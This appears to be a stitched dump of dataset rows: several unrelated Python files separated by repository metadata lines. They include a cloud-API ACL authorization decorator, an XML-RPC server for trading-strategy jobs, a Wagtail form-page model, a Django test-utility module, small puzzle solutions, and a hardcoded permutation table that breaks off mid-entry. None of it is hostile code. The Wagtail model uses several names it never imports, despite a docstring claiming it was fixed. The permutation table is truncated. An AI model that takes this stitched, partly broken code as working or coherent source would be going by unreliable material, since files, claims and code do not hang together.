        fullacl.update(self.expandAclFromCloudspace(users, groups, cloudspace))
        return fullacl
    def expandAclFromCloudspace(self, users, groups, cloudspace):
        """Collect the rights held on *cloudspace*, always including account ACEs."""
        if not self.level or self.level == 'cloudspace':
            fullacl = self.expandAcl(users, groups, cloudspace.acl)
        else:
            fullacl = set()
        account = cloudspace.account
        fullacl.update(self.expandAcl(users, groups, account.acl))
        return fullacl
    def expandAclFromAccount(self, users, groups, account):
        """Collect the rights held directly on *account*."""
        fullacl = self.expandAcl(users, groups, account.acl)
        return fullacl
    def expandAcl(self, user, groups, acl):
        """Union the right-sets of every ACE matching *user* or one of *groups*."""
        fullacl = set()
        for ace in acl:
            right = set(ace.right)
            if ace.type == 'U' and ace.userGroupId == user:
                fullacl.update(right)
            elif ace.type == 'G' and ace.userGroupId in groups:
                fullacl.update(right)
        return fullacl
    def __call__(self, func):
        def wrapper(*args, **kwargs):
            if 'ctx' not in kwargs:
                # call is not performed over rest let it pass
                return func(*args, **kwargs)
            ctx = kwargs['ctx']
            ctx.env['JS_AUDIT'] = True
            tags = j.data.tags.getObject()
            user = ctx.env['beaker.session']['user']
            account = None
            cloudspace = None
            machine = None
            if self.acl:
                # Resolve the most specific resource named in kwargs and walk
                # up to its parents (machine -> cloudspace -> account).
                if 'machineId' in kwargs and kwargs['machineId']:
                    machine = self.models.VMachine.get(kwargs['machineId'])
                    cloudspace = machine.cloudspace
                    account = cloudspace.account
                elif 'diskId' in kwargs and kwargs['diskId']:
                    disk = self.models.Disk.get(kwargs['diskId'])
                    machine = self.models.VMachine.objects(disks=disk.id, status__ne='DESTROYED').first()
                    if machine:
                        cloudspace = machine.cloudspace
                    account = disk.account
                elif 'cloudspaceId' in kwargs and kwargs['cloudspaceId']:
                    cloudspace = self.models.Cloudspace.get(kwargs['cloudspaceId'])
                    account = cloudspace.account
                elif 'accountId' in kwargs and kwargs['accountId']:
                    account = self.models.Account.get(kwargs['accountId'])
            # Record the resolved resource ids as audit tags on the context.
            for key, value in (('accountId', account), ('cloudspaceId', cloudspace), ('machineId', machine)):
                if value is not None:
                    tags.tagSet(key, str(value.id))
            ctx.env['tags'] = str(tags)
            if self.isAuthorized(user, account, cloudspace, machine):
                return func(*args, **kwargs)
            else:
                raise exceptions.Forbidden(
                    '''User: "%s" isn't allowed to execute this action.
                    Not enough permissions''' % user)
        return wrapper
    def checkAccountStatus(self, requiredaccessrights, account):
        """
        Check that the required action may be executed given the account status.

        A DESTROYED account raises 404 NotFound; any action requiring more than
        READ access on the account (or one of its cloudspaces or machines)
        raises 403 Forbidden unless the account status is CONFIRMED.

        :param requiredaccessrights: the required access rights to access an account or one of
            its cloudspaces or machines
        :param account: the account object its status should be checked
        :raise Exception with 404 if destroyed or 403 Forbidden if a non-read action cannot be
            performed on the account or one of its cloudspaces or machines
        """
        if account.status == 'DESTROYED':
            raise exceptions.NotFound('Could not find an accessible resource.')
        elif requiredaccessrights != set('R') and account.status != 'CONFIRMED':
            raise exceptions.Forbidden('Only READ actions can be executed on account '
                                       '(or one of its cloudspace or machines) with status %s.' %
                                       account.status)
    def checkCloudspaceStatus(self, requiredaccessrights, cloudspace):
        """
        Check if the required action can be executed on a cloudspace. If cloudspace is
        'DESTROYED' then a 404 NotFound will be returned, else if an action requires a permission
        other than READ, the call will fail with 403 Forbidden if cloudspace is not in any of the
        statuses 'VIRTUAL', 'DEPLOYING' or 'DEPLOYED'

        :param requiredaccessrights: the required access rights to access a cloudspace or one of
            its machines
        :param cloudspace: the cloudspace object its status should be checked
        :raise Exception with 404 if destroyed or 403 Forbidden if a non-read action cannot be
            performed on the cloudspace or one of its machines
        """
        if cloudspace.status == 'DESTROYED':
            raise exceptions.NotFound('Could not find an accessible resource.')
        elif requiredaccessrights != set('R') and cloudspace.status not in ['VIRTUAL', 'DEPLOYING',
                                                                            'DEPLOYED']:
            raise exceptions.Forbidden('Only READ actions can be executed on cloudspace '
                                       '(or one of its machines) with status %s.' %
                                       cloudspace.status)
    def isAuthorized(self, username, account, cloudspace=None, machine=None):
        """
        Check if a user has the authorization to access a resource
        :param username: username of the user to be checked
        :param machine: machine object if authorization should be done on machine level
        :param cloudspace: cloudspace object if authorization should be done on cloudspace level
        :param account: account object if authorization should be done on account level
        :return: True if username is authorized to access the resource, False otherwise
        """
        userobj = j.portal.tools.models.system.User.objects(name=username).first()
        if not userobj or not userobj.active:
            raise exceptions.Forbidden('User is not allowed to execute action while status is '
                                       'inactive.')
        groups = userobj.groups
        # add brokeradmin access
        if 'admin' in groups:
            return True
        # Try each configured level; a level whose required rights are fully
        # granted authorizes the call after the status checks pass.
        if 'account' in self.acl and account:
            grantedaccountacl = self.expandAclFromAccount(username, groups, account)
            if self.acl['account'].issubset(grantedaccountacl):
                self.checkAccountStatus(self.acl['account'], account)
                return True
        if 'cloudspace' in self.acl and cloudspace:
            grantedcloudspaceacl = self.expandAclFromCloudspace(username, groups, cloudspace)
            if self.acl['cloudspace'].issubset(grantedcloudspaceacl):
                self.checkAccountStatus(self.acl['cloudspace'], account)
                self.checkCloudspaceStatus(self.acl['cloudspace'], cloudspace)
                return True
        if 'machine' in self.acl and machine:
            grantedmachineacl = self.expandAclFromVMachine(username, groups, machine)
            if self.acl['machine'].issubset(grantedmachineacl):
                self.checkAccountStatus(self.acl['machine'], account)
                self.checkCloudspaceStatus(self.acl['machine'], cloudspace)
                return True
        return False
| [
"[email protected]"
] | |
3925ddc8929dab5fdcfe92af27724f8b26c01938 | 9806c35c4acfa16e56535970dbe5f84271b67664 | /eod_aps/wsdl/cta_strategy_wsdl/cta_strategy_wsdl_assemble.py | 71c81c7c89cbf04204b023b497654d74226099a3 | [] | no_license | dsjmhjs/python_eod | a8e3513c77a37cfebf2f21a55bfb19449b8a013b | 48207dd15e7079ef5fd2cf999367c429087197ea | refs/heads/master | 2020-06-25T23:22:30.874309 | 2019-07-29T10:26:02 | 2019-07-29T10:26:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,476 | py | # -*- coding: utf-8 -*-
import socket
from SimpleXMLRPCServer import SimpleXMLRPCServer
from eod_aps.wsdl.cta_strategy_wsdl.strategy_init_tools import backtest_init
from eod_aps.wsdl.cta_strategy_wsdl.load_strategy_parameter_tools import load_strategy_parameter
from eod_aps.wsdl.cta_strategy_wsdl.strategy_online_offline_tools import strategy_online_offline_job
from eod_aps.model.server_constans import server_constant
def cta_test():
    """Probe every configured CTA server and report connectivity per server.

    Runs ``ls`` on each server; an 'apps' entry in the listing is taken as
    proof the command executed. Returns one status line per server.
    """
    report = ""
    for server_name in server_constant.get_cta_servers():
        server_model = server_constant.get_server_model(server_name)
        listing = server_model.run_cmd_str('ls')
        if 'apps' in listing:
            report += '%s: connect success!\n' % server_name
        else:
            report += '%s: connect error!\n' % server_name
    return report
def insert_strategy_state_sql():
    """Run the strategy-state SQL job over all CTA servers.

    Returns 0 so XML-RPC callers get a serializable success marker.
    """
    cta_server_list = server_constant.get_cta_servers()
    # Imported lazily, matching the original module's deferred dependency.
    from eod_aps.job.insert_strategy_state_sql_job import insert_strategy_state_sql_job
    insert_strategy_state_sql_job(cta_server_list)
    return 0
if __name__ == '__main__':
    # Expose the CTA maintenance jobs over XML-RPC on port 8000,
    # bound to this host's resolved address.
    s = SimpleXMLRPCServer((socket.gethostbyname(socket.gethostname()), 8000))
    s.register_function(cta_test)
    s.register_function(backtest_init)
    s.register_function(load_strategy_parameter)
    s.register_function(strategy_online_offline_job)
    s.register_function(insert_strategy_state_sql)
    s.serve_forever()
| [
"123456789"
] | 123456789 |
a0a5a76363e80cfc5a89359595d80aa2fb243154 | e0980f704a573894350e285f66f4cf390837238e | /.history/news/models_20201124143954.py | a2869c41e721c2526bbf773e0ca6be950d1e2aec | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 923 | py | from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
    """Wagtail form page for news submissions, rendered with a map image.

    Fixes from the work-in-progress snapshot: the misspelled Wagtail
    attributes ('tempalte' -> 'template', 'leanding_page_template' ->
    'landing_page_template', 'max_coun' -> 'max_count', 'content_panel' ->
    'content_panels'), the unfinished ``map_url = URL Fild`` syntax error,
    the argument-less ``ForeignKey()``, and the 'map_iamge' panel typo.
    """
    template = 'news/news_page.html'
    landing_page_template = 'news/news_page_leading.html'
    subpage_types = []  # leaf page: no children allowed
    max_count = 1  # only one NewsPage instance may exist
    intro = RichTextField(blank=True, features=['bold', 'italic', 'ol', 'ul'])
    thank_you_text = RichTextField(
        blank=True,
        features=['bold', 'italic', 'ol', 'ul'])
    # NOTE(review): the original ForeignKey had no arguments; the standard
    # Wagtail image relation is assumed here — confirm the intended target.
    map_image = models.ForeignKey(
        'wagtailimages.Image',
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name='+',
    )
    map_url = models.URLField(blank=True)
    content_panels = AbstractEmailForm.content_panels + [
        FieldPanel('intro'),
        ImageChooserPanel('map_image'),
        FieldPanel('map_url'),
        InlinePanel('form_fields', label="Form Fields"),
        FieldPanel('thank_you_text'),
        FieldPanel('from_address'),
        FieldPanel('to_address'),
        FieldPanel('subject'),
    ]
| [
"[email protected]"
] | |
05a4146fb28b5f723da1e8ab746ca4eb4e677b6b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03011/s395360833.py | 44b3d72ee3c129c4de5a06d9a9944ff6210fa8d1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | a, b, c = [int(i) for i in input().split()]
# Sums of each pair of the three ticket prices read above; the cheapest
# pair is printed as the answer.
d = a + b
e = a + c
f = b + c
print(min(d, e, f)) | [
"[email protected]"
] | |
287ffcfa056904f0ad86c399480127764911db51 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /kQayLoFNx4QgWahHu_2.py | bb1af1605885be1f995a2ebb66e86374b3d9b1ed | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | """
R, a programming language used for Statistics and Data Analysis, has the
function `order`, which returns a list with the indices needed to sort the
original vector(∗).
For example:
my_list = [1, 3, 3, 9, 8]
# Ordered would be: [0, 1, 2, 4, 3]
In plain words, `order` tells you what elements to look at in your original
vector to sort it. The list `my_list[0] + my_list[1] + my_list[2] + my_list[4]
+ my_list[3]` is equivalent to `sorted(my_list)`.
If two or more elements have the same order, their original order is
preserved. Here, `[0, 1, 2, 4, 3]` and `[0, 2, 1, 4, 3]` would both sort the
vector, but only the first one preserves the original order for the two `3`s.
Implement the function `order()` so that it works the same way it does in R.
### Examples
order([9, 1, 4, 5, 4]) ➞ [1, 2, 4, 3, 0]
order(["z", "c", "f", "b", "c"]) ➞ [3, 1, 4, 2, 0]
order(["order", "my", "words"]) ➞ [1, 0, 2]
### Notes
* Expect numbers and lower-case alphabetic characters only.
* Find Part II: Rank [here](https://edabit.com/challenge/dFosbGy8sFFCEx2Ne).
* Vectors in R are similar to a list. Although vectors in R are 1-indexed, your function should be 0-indexed. Other differences between vectors and lists will be ignored for the scope of this challenge.
* If you implement your own algorithm, it must be **stable** , meaning that the order of identical elements doesn't get switched around.
"""
def order(lst):
    """Return the 0-based permutation that sorts *lst* (like R's ``order``).

    The result is stable: equal elements keep their original relative order,
    because ``list.sort`` is a stable sort.
    """
    indices = list(range(len(lst)))
    indices.sort(key=lst.__getitem__)
    return indices
| [
"[email protected]"
] | |
fea56c3ed93ad23d5f94bf01932101dfd8229ae3 | 29e526fb77bc4c13082a0f9c0f4104684a01893b | /apps/shared/tests/__init__.py | e2701bc458fa041f89d343db30d387d028135fda | [
"BSD-3-Clause",
"MIT"
] | permissive | Hugochazz/affiliates | 767034519426a657c0e9b3e38fee94cc3e0042ca | e234b0ab925b33d71cb5ded3d51dccbcbb0e59c1 | refs/heads/master | 2020-12-25T13:51:53.974167 | 2012-10-30T14:55:50 | 2012-10-30T14:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,655 | py | from contextlib import contextmanager, nested
from functools import wraps
from smtplib import SMTPException
from django.conf import settings
from django.contrib.sessions.middleware import SessionMiddleware
from django.core.mail.backends.base import BaseEmailBackend
from django.core.management import call_command
from django.db.models import loading
from django.test.client import RequestFactory
from django.utils.translation import get_language
import test_utils
from funfactory.urlresolvers import (get_url_prefix, Prefixer, reverse,
set_url_prefix)
from mock import patch
from nose.tools import eq_, ok_
from tower import activate
from browserid.tests import mock_browserid
from facebook.tests import FacebookAuthClient
class BrokenSMTPBackend(BaseEmailBackend):
    """Email backend stub whose every send attempt fails."""

    def send_messages(self, email_messages):
        # Simulate a transport failure regardless of the messages given.
        raise SMTPException('Dummy')
def model_ids(models):
    """Return the primary keys (``pk``) of the given model instances."""
    return [instance.pk for instance in models]
class SessionRequestFactory(RequestFactory):
    """RequestFactory whose requests come pre-populated with session data."""

    def __init__(self, *args, **kwargs):
        super(SessionRequestFactory, self).__init__(*args, **kwargs)
        # A single middleware instance is reused for every request built.
        self.session_middleware = SessionMiddleware()

    def request(self, *args, **kwargs):
        req = super(SessionRequestFactory, self).request(*args, **kwargs)
        # Attach a session to the freshly built request before returning it.
        self.session_middleware.process_request(req)
        return req
class TestCase(test_utils.TestCase):
    """Base class for Affiliates test cases."""
    client_class = FacebookAuthClient

    @contextmanager
    def activate(self, locale):
        """Context manager that temporarily activates a locale."""
        # Remember the current prefix/locale so they can be restored on exit.
        saved_prefix = get_url_prefix()
        saved_locale = get_language()
        factory = test_utils.RequestFactory()
        set_url_prefix(Prefixer(factory.get('/%s/' % (locale,))))
        activate(locale)
        yield
        set_url_prefix(saved_prefix)
        activate(saved_locale)

    def browserid_login(self, email):
        """Log the test client in via a mocked BrowserID assertion."""
        factory = SessionRequestFactory()
        with self.activate('en-US'):
            request = factory.get(reverse('home'))
        with mock_browserid(email):
            self.client.login(request=request, assertion='asdf')

    def assert_viewname_url(self, url, viewname, locale='en-US'):
        """Assert that *url* ends with the reversed URL for *viewname*."""
        with self.activate(locale):
            view_url = reverse(viewname)
        return ok_(url.endswith(view_url),
                   'URL Match failed: %s != %s' % (url, view_url))

    def assert_redirects(self, response, url, status=302):
        """Assert that the given response redirects to the given url."""
        eq_(response.status_code, status)
        eq_(response['Location'], url)
class ModelsTestCase(TestCase):
    """
    TestCase that installs extra Django apps (creating their tables) for
    the duration of a test, then restores the original configuration.

    Subclass this and set ``apps`` to a tuple of *additional* installed
    apps. These will be added *after* the ones in settings.INSTALLED_APPS.

    Based on http://stackoverflow.com/questions/502916#1827272
    """
    apps = []

    def _pre_setup(self):
        # Remember the pristine app list so teardown can restore it.
        self._original_installed_apps = list(settings.INSTALLED_APPS)
        settings.INSTALLED_APPS.extend(self.apps)
        # Invalidate Django's app cache so the new apps are picked up.
        loading.cache.loaded = False
        call_command('syncdb', interactive=False, verbosity=0)
        # Let the stock implementation handle fixtures etc.
        super(ModelsTestCase, self)._pre_setup()

    def _post_teardown(self):
        super(ModelsTestCase, self)._post_teardown()
        # Put the settings back exactly the way we found them.
        settings.INSTALLED_APPS = self._original_installed_apps
        loading.cache.loaded = False
def refresh_model(instance):
    """Fetch a fresh copy of *instance* from the database by primary key."""
    model_class = instance.__class__
    return model_class.objects.get(pk=instance.pk)
def patch_settings(**new_settings):
    """
    Syntactic sugar for patching many settings at once.

    TODO: Replace with override_settings in Django 1.4.
    """
    def decorator(f):
        @wraps(f)
        def wrapped(*args, **kwargs):
            # One mock patch per setting, all active for the call's duration.
            patches = [patch.object(settings, name, value)
                       for name, value in new_settings.items()]
            with nested(*patches):
                return f(*args, **kwargs)
        return wrapped
    return decorator
| [
"[email protected]"
] | |
632ca58d7b0bc344597473fc66f370f4e79ffa9f | 5f22ddbd3eeb99709e43e7b9a7958c9987c7efa4 | /__competitions/2016/02_15_w19/05.py | 837fdc9e769430694fa5c641b0205db0b1b6dd68 | [] | no_license | salvador-dali/algorithms_general | 04950bd823fc354adc58a4f23b7d2f3d39664798 | aeee3356e2488c6fab08741b1ac26e8bd5e4ac0d | refs/heads/master | 2020-12-14T06:24:10.466601 | 2016-07-17T06:00:17 | 2016-07-17T06:00:17 | 47,397,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,629 | py | def getArraysFastEven(n, k):
if k == 1:
return tuple([val for pair in zip(range(n / 2, 0, -1), range(n, n/2, -1)) for val in pair])
if k == 2:
return tuple([val for pair in zip(range(n / 2 + 1, n + 1), range(1, n / 2 + 1)) for val in pair])
return -1
def getArraysFastOdd(n, k):
d={
1:[1],
3:[(1,2,3),(1,3,2),(2,1,3),(2,3,1),(3,1,2),(3,2,1)],
5:[(1,3,5,2,4),(1,4,2,5,3),(2,4,1,3,5),(2,4,1,5,3),(2,5,3,1,4),(3,1,4,2,5),(3,1,5,2,4),(3,5,1,4,2),(3,5,2,4,1),(4,1,3,5,2),(4,2,5,1,3),(4,2,5,3,1),(5,2,4,1,3),(5,3,1,4,2)],
7:[(1,4,7,3,6,2,5),(1,5,2,6,3,7,4),(2,5,1,4,7,3,6),(2,5,1,6,3,7,4),(2,6,3,7,4,1,5),(3,6,1,4,7,2,5),(3,6,1,5,2,7,4),(3,6,2,5,1,4,7),(3,6,2,5,1,7,4),(3,6,2,7,4,1,5),(3,7,4,1,5,2,6),(3,7,4,1,6,2,5),(4,1,5,2,6,3,7),(4,1,5,2,7,3,6),(4,1,6,3,7,2,5),(4,1,7,3,6,2,5),(4,7,1,5,2,6,3),(4,7,2,5,1,6,3),(4,7,3,6,1,5,2),(4,7,3,6,2,5,1),(5,1,4,7,2,6,3),(5,1,4,7,3,6,2),(5,2,6,1,4,7,3),(5,2,6,3,7,1,4),(5,2,6,3,7,4,1),(5,2,7,3,6,1,4),(5,2,7,4,1,6,3),(6,2,5,1,4,7,3),(6,3,7,2,5,1,4),(6,3,7,4,1,5,2),(7,3,6,2,5,1,4),(7,4,1,5,2,6,3)],
9:[(1,5,9,4,8,3,7,2,6),(1,6,2,7,3,8,4,9,5),(2,6,1,5,9,4,8,3,7),(2,6,1,7,3,8,4,9,5),(2,7,3,8,4,9,5,1,6),(3,7,1,5,9,4,8,2,6),(3,7,1,6,2,8,4,9,5),(3,7,2,6,1,5,9,4,8),(3,7,2,6,1,8,4,9,5),(3,7,2,8,4,9,5,1,6),(3,8,4,9,5,1,6,2,7),(3,8,4,9,5,1,7,2,6),(4,8,1,5,9,3,7,2,6),(4,8,1,6,2,7,3,9,5),(4,8,2,6,1,5,9,3,7),(4,8,2,6,1,7,3,9,5),(4,8,2,7,3,9,5,1,6),(4,8,3,7,1,5,9,2,6),(4,8,3,7,1,6,2,9,5),(4,8,3,7,2,6,1,5,9),(4,8,3,7,2,6,1,9,5),(4,8,3,7,2,9,5,1,6),(4,8,3,9,5,1,6,2,7),(4,8,3,9,5,1,7,2,6),(4,9,5,1,6,2,7,3,8),(4,9,5,1,6,2,8,3,7),(4,9,5,1,7,3,8,2,6),(4,9,5,1,8,3,7,2,6),(5,1,6,2,7,3,8,4,9),(5,1,6,2,7,3,9,4,8),(5,1,6,2,8,4,9,3,7),(5,1,6,2,9,4,8,3,7),(5,1,7,3,8,4,9,2,6),(5,1,7,3,9,4,8,2,6),(5,1,8,4,9,3,7,2,6),(5,1,9,4,8,3,7,2,6),(5,9,1,6,2,7,3,8,4),(5,9,2,6,1,7,3,8,4),(5,9,3,7,1,6,2,8,4),(5,9,3,7,2,6,1,8,4),(5,9,4,8,1,6,2,7,3),(5,9,4,8,2,6,1,7,3),(5,9,4,8,3,7,1,6,2),(5,9,4,8,3,7,2,6,1),(6,1,5,9,2,7,3,8,4),(6,1,5,9,3,7,2,8,4),(6,1,5,9,4,8,2,7,3),(6,1,5,9,4,8,3,7,2),(6,2,7,1,5,9,3,8,4),(6,2,7,1,5,9,4,8,3),(6,2,7,3,8,1,5,9,4),(6,2,7,3,8,4,9,1,5),(6,2,7,3,8,4,9,5,1),(6,2,7,3,9,4,8,1,5),(6,2,7,3,9,5,1,8,4),(6,2,8,3,7,1,5,9,4),(6,2,8,4,9,3,7,1,5),(6,2,8,4,9,5,1,7,3),(6,2,9,4,8,3,7,1,5),(6,2,9,5,1,7,3,8,4),(7,2,6,1,5,9,3,8,4),(7,2,6,1,5,9,4,8,3),(7,3,8,2,6,1,5,9,4),(7,3,8,4,9,2,6,1,5),(7,3,8,4,9,5,1,6,2),(7,3,9,4,8,2,6,1,5),(7,3,9,5,1,6,2,8,4),(8,3,7,2,6,1,5,9,4),(8,4,9,3,7,2,6,1,5),(8,4,9,5,1,6,2,7,3),(9,4,8,3,7,2,6,1,5),(9,5,1,6,2,7,3,8,4)],
11:[(1,6,11,5,10,4,9,3,8,2,7),(1,7,2,8,3,9,4,10,5,11,6),(2,7,1,6,11,5,10,4,9,3,8),(2,7,1,8,3,9,4,10,5,11,6),(2,8,3,9,4,10,5,11,6,1,7),(3,8,1,6,11,5,10,4,9,2,7),(3,8,1,7,2,9,4,10,5,11,6),(3,8,2,7,1,6,11,5,10,4,9),(3,8,2,7,1,9,4,10,5,11,6),(3,8,2,9,4,10,5,11,6,1,7),(3,9,4,10,5,11,6,1,7,2,8),(3,9,4,10,5,11,6,1,8,2,7),(4,9,1,6,11,5,10,3,8,2,7),(4,9,1,7,2,8,3,10,5,11,6),(4,9,2,7,1,6,11,5,10,3,8),(4,9,2,7,1,8,3,10,5,11,6),(4,9,2,8,3,10,5,11,6,1,7),(4,9,3,8,1,6,11,5,10,2,7),(4,9,3,8,1,7,2,10,5,11,6),(4,9,3,8,2,7,1,6,11,5,10),(4,9,3,8,2,7,1,10,5,11,6),(4,9,3,8,2,10,5,11,6,1,7),(4,9,3,10,5,11,6,1,7,2,8),(4,9,3,10,5,11,6,1,8,2,7),(4,10,5,11,6,1,7,2,8,3,9),(4,10,5,11,6,1,7,2,9,3,8),(4,10,5,11,6,1,8,3,9,2,7),(4,10,5,11,6,1,9,3,8,2,7),(5,10,1,6,11,4,9,3,8,2,7),(5,10,1,7,2,8,3,9,4,11,6),(5,10,2,7,1,6,11,4,9,3,8),(5,10,2,7,1,8,3,9,4,11,6),(5,10,2,8,3,9,4,11,6,1,7),(5,10,3,8,1,6,11,4,9,2,7),(5,10,3,8,1,7,2,9,4,11,6),(5,10,3,8,2,7,1,6,11,4,9),(5,10,3,8,2,7,1,9,4,11,6),(5,10,3,8,2,9,4,11,6,1,7),(5,10,3,9,4,11,6,1,7,2,8),(5,10,3,9,4,11,6,1,8,2,7),(5,10,4,9,1,6,11,3,8,2,7),(5,10,4,9,1,7,2,8,3,11,6),(5,10,4,9,2,7,1,6,11,3,8),(5,10,4,9,2,7,1,8,3,11,6),(5,10,4,9,2,8,3,11,6,1,7),(5,10,4,9,3,8,1,6,11,2,7),(5,10,4,9,3,8,1,7,2,11,6),(5,10,4,9,3,8,2,7,1,6,11),(5,10,4,9,3,8,2,7,1,11,6),(5,10,4,9,3,8,2,11,6,1,7),(5,10,4,9,3,11,6,1,7,2,8),(5,10,4,9,3,11,6,1,8,2,7),(5,10,4,11,6,1,7,2,8,3,9),(5,10,4,11,6,1,7,2,9,3,8),(5,10,4,11,6,1,8,3,9,2,7),(5,10,4,11,6,1,9,3,8,2,7),(5,11,6,1,7,2,8,3,9,4,10),(5,11,6,1,7,2,8,3,10,4,9),(5,11,6,1,7,2,9,4,10,3,8),(5,11,6,1,7,2,10,4,9,3,8),(5,11,6,1,8,3,9,4,10,2,7),(5,11,6,1,8,3,10,4,9,2,7),(5,11,6,1,9,4,10,3,8,2,7),(5,11,6,1,10,4,9,3,8,2,7),(6,1,7,2,8,3,9,4,10,5,11),(6,1,7,2,8,3,9,4,11,5,10),(6,1,7,2,8,3,10,5,11,4,9),(6,1,7,2,8,3,11,5,10,4,9),(6,1,7,2,9,4,10,5,11,3,8),(6,1,7,2,9,4,11,5,10,3,8),(6,1,7,2,10,5,11,4,9,3,8),(6,1,7,2,11,5,10,4,9,3,8),(6,1,8,3,9,4,10,5,11,2,7),(6,1,8,3,9,4,11,5,10,2,7),(6,1,8,3,10,5,11,4,9,2,7),(6,1,8,3,11,5,10,4,9,2,7),(6,1,9,4,10,5,11,3,8
,2,7),(6,1,9,4,11,5,10,3,8,2,7),(6,1,10,5,11,4,9,3,8,2,7),(6,1,11,5,10,4,9,3,8,2,7),(6,11,1,7,2,8,3,9,4,10,5),(6,11,2,7,1,8,3,9,4,10,5),(6,11,3,8,1,7,2,9,4,10,5),(6,11,3,8,2,7,1,9,4,10,5),(6,11,4,9,1,7,2,8,3,10,5),(6,11,4,9,2,7,1,8,3,10,5),(6,11,4,9,3,8,1,7,2,10,5),(6,11,4,9,3,8,2,7,1,10,5),(6,11,5,10,1,7,2,8,3,9,4),(6,11,5,10,2,7,1,8,3,9,4),(6,11,5,10,3,8,1,7,2,9,4),(6,11,5,10,3,8,2,7,1,9,4),(6,11,5,10,4,9,1,7,2,8,3),(6,11,5,10,4,9,2,7,1,8,3),(6,11,5,10,4,9,3,8,1,7,2),(6,11,5,10,4,9,3,8,2,7,1),(7,1,6,11,2,8,3,9,4,10,5),(7,1,6,11,3,8,2,9,4,10,5),(7,1,6,11,4,9,2,8,3,10,5),(7,1,6,11,4,9,3,8,2,10,5),(7,1,6,11,5,10,2,8,3,9,4),(7,1,6,11,5,10,3,8,2,9,4),(7,1,6,11,5,10,4,9,2,8,3),(7,1,6,11,5,10,4,9,3,8,2),(7,2,8,1,6,11,3,9,4,10,5),(7,2,8,1,6,11,4,9,3,10,5),(7,2,8,1,6,11,5,10,3,9,4),(7,2,8,1,6,11,5,10,4,9,3),(7,2,8,3,9,1,6,11,4,10,5),(7,2,8,3,9,1,6,11,5,10,4),(7,2,8,3,9,4,10,1,6,11,5),(7,2,8,3,9,4,10,5,11,1,6),(7,2,8,3,9,4,10,5,11,6,1),(7,2,8,3,9,4,11,5,10,1,6),(7,2,8,3,9,4,11,6,1,10,5),(7,2,8,3,10,4,9,1,6,11,5),(7,2,8,3,10,5,11,4,9,1,6),(7,2,8,3,10,5,11,6,1,9,4),(7,2,8,3,11,5,10,4,9,1,6),(7,2,8,3,11,6,1,9,4,10,5),(7,2,9,3,8,1,6,11,4,10,5),(7,2,9,3,8,1,6,11,5,10,4),(7,2,9,4,10,3,8,1,6,11,5),(7,2,9,4,10,5,11,3,8,1,6),(7,2,9,4,10,5,11,6,1,8,3),(7,2,9,4,11,5,10,3,8,1,6),(7,2,9,4,11,6,1,8,3,10,5),(7,2,10,4,9,3,8,1,6,11,5),(7,2,10,5,11,4,9,3,8,1,6),(7,2,10,5,11,6,1,8,3,9,4),(7,2,11,5,10,4,9,3,8,1,6),(7,2,11,6,1,8,3,9,4,10,5),(8,2,7,1,6,11,3,9,4,10,5),(8,2,7,1,6,11,4,9,3,10,5),(8,2,7,1,6,11,5,10,3,9,4),(8,2,7,1,6,11,5,10,4,9,3),(8,3,9,2,7,1,6,11,4,10,5),(8,3,9,2,7,1,6,11,5,10,4),(8,3,9,4,10,2,7,1,6,11,5),(8,3,9,4,10,5,11,2,7,1,6),(8,3,9,4,10,5,11,6,1,7,2),(8,3,9,4,11,5,10,2,7,1,6),(8,3,9,4,11,6,1,7,2,10,5),(8,3,10,4,9,2,7,1,6,11,5),(8,3,10,5,11,4,9,2,7,1,6),(8,3,10,5,11,6,1,7,2,9,4),(8,3,11,5,10,4,9,2,7,1,6),(8,3,11,6,1,7,2,9,4,10,5),(9,3,8,2,7,1,6,11,4,10,5),(9,3,8,2,7,1,6,11,5,10,4),(9,4,10,3,8,2,7,1,6,11,5),(9,4,10,5,11,3,8,2,7,1,6),(9,4,10,5,11,6,1,7,2,8,3),(9,4,11,5,10,3,8,2
,7,1,6),(9,4,11,6,1,7,2,8,3,10,5),(10,4,9,3,8,2,7,1,6,11,5),(10,5,11,4,9,3,8,2,7,1,6),(10,5,11,6,1,7,2,8,3,9,4),(11,5,10,4,9,3,8,2,7,1,6),(11,6,1,7,2,8,3,9,4,10,5)],
